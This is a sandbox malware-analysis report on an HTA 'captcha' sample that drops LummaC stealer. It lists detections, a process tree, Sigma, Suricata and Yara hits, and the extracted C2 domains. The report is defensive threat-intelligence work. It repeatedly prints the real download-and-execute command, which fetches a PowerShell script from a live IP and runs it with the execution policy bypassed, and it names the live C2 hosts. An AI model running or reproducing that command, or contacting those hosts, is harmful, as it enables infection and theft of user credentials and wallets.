Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:	Captcha.hta
Analysis ID:	1573886
MD5:	a7045bcb116c3d85f1ff3706bec2b920
SHA1:	4ff06af316d7e0453c948d358065d71301ea204a
SHA256:	8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
Infos:

Detection

LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected HtmlPhish44

Yara detected LummaC Stealer

Yara detected obfuscated html page

.NET source code contains very large strings

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

LummaC encrypted strings found

Machine Learning detection for dropped file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Suspicious MSHTA Child Process

Suspicious command line found

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

mshta.exe (PID: 2492 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 568 cmdline: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

curl.exe (PID: 1844 cmdline: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 MD5: 4329254E74AD91D047E3CEDCC7C138C3)

powershell.exe (PID: 5040 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 4768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 3308 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 1848 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["awake-weaves.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz"], "Build id": "DUkgLv--EBALAY"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Captcha.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
Captcha.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: powershell.exe PID: 5040	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 5040	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x40ac2d:$b2: ::FromBase64String( 0x40ac69:$b2: ::FromBase64String( 0x40d65b:$b2: ::FromBase64String( 0x40d69b:$b2: ::FromBase64String( 0x29a2b7:$s1: -join 0x29aa2d:$s1: -join 0x2f3369:$s1: -join 0x30043e:$s1: -join 0x303810:$s1: -join 0x303ec2:$s1: -join 0x3059b3:$s1: -join 0x307bb9:$s1: -join 0x3083e0:$s1: -join 0x308c50:$s1: -join 0x30938b:$s1: -join 0x3093bd:$s1: -join 0x309405:$s1: -join 0x309424:$s1: -join 0x309c74:$s1: -join 0x309df0:$s1: -join 0x309e68:$s1: -join
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
7.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2492, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 568, ProcessName: cmd.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5040, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", ProcessId: 4768, ProcessName: csc.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2492, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 568, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5040, TargetFilename: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5040, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", ProcessId: 4768, ProcessName: csc.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:33:59.162444+0100	2028371	3	Unknown Traffic	192.168.11.20	49711	172.67.207.38	443	TCP
2024-12-12T17:34:00.352278+0100	2028371	3	Unknown Traffic	192.168.11.20	49712	172.67.207.38	443	TCP
2024-12-12T17:34:01.198117+0100	2028371	3	Unknown Traffic	192.168.11.20	49713	172.67.207.38	443	TCP
2024-12-12T17:34:02.050943+0100	2028371	3	Unknown Traffic	192.168.11.20	49714	172.67.207.38	443	TCP
2024-12-12T17:34:03.244896+0100	2028371	3	Unknown Traffic	192.168.11.20	49715	172.67.207.38	443	TCP
2024-12-12T17:34:04.255802+0100	2028371	3	Unknown Traffic	192.168.11.20	49716	172.67.207.38	443	TCP
2024-12-12T17:34:05.548951+0100	2028371	3	Unknown Traffic	192.168.11.20	49717	172.67.207.38	443	TCP
2024-12-12T17:34:08.579973+0100	2028371	3	Unknown Traffic	192.168.11.20	49718	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:34:00.033272+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49711	172.67.207.38	443	TCP
2024-12-12T17:34:00.936925+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49712	172.67.207.38	443	TCP
2024-12-12T17:34:09.472822+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49718	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:34:00.033272+0100	2049836	1	A Network Trojan was detected	192.168.11.20	49711	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:34:00.936925+0100	2049812	1	A Network Trojan was detected	192.168.11.20	49712	172.67.207.38	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:33:57.549674+0100	2019714	2	Potentially Bad Traffic	192.168.11.20	49710	147.45.44.131	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:34:02.947656+0100	2048094	1	Malware Command and Control Activity Detected	192.168.11.20	49714	172.67.207.38	443	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T17:33:57.550523+0100	2800029	1	Attempted User Privilege Gain	147.45.44.131	80	192.168.11.20	49710	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: awake-weaves.cyou	Avira URL Cloud: Label: malware
Source: sordid-snaked.cyou	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/api	Avira URL Cloud: Label: malware
Source: wrathful-jammy.cyou	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 7.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz"], "Build id": "DUkgLv--EBALAY"}

Multi AV Scanner detection for submitted file

Source: Captcha.hta

ReversingLabs: Detection: 13%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DUkgLv--EBALAY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00415298 CryptUnprotectData,		7_2_00415298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00415F66 CryptUnprotectData,CryptUnprotectData,		7_2_00415F66

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: Captcha.hta, type: SAMPLE

Yara detected obfuscated html page

Source: Yara match

File source: Captcha.hta, type: SAMPLE

Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49718 version: TLS 1.2

Source:	Binary string: System.Windows.Forms.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Drawing.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: q8C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	7_2_0040C917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	7_2_00425990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, di	7_2_00425990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	7_2_00415298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	7_2_00415298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	7_2_0043CB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042C45C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	7_2_0042B4FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0042B4FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	7_2_0043CD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	7_2_0040DD25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	7_2_00415F66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	7_2_00419770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0040CFF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	7_2_0040CFF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp al, 2Eh	7_2_00426054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	7_2_00426054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	7_2_0043B05D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	7_2_0043B05D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	7_2_0043B068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	7_2_0043B068
